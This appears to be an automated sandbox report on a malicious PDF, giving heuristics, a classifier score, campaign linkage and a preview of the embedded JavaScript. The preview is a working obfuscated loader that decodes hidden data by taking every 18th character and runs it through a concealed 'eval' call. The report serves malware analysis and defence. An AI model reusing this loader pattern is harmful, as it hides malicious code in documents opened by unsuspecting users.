SUSPICIOUS
54
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is often used to download and execute further stages of a payload. The embedded JavaScript file 'javascript_obj0007_000.js' is the primary indicator of malicious activity.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 3
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign:
shared payload 1bc4bf38a7
55 samples
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x1CC | 254 bytes |
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){ rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd); rf=re.one.value+re.two.value;this[rf](rc);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.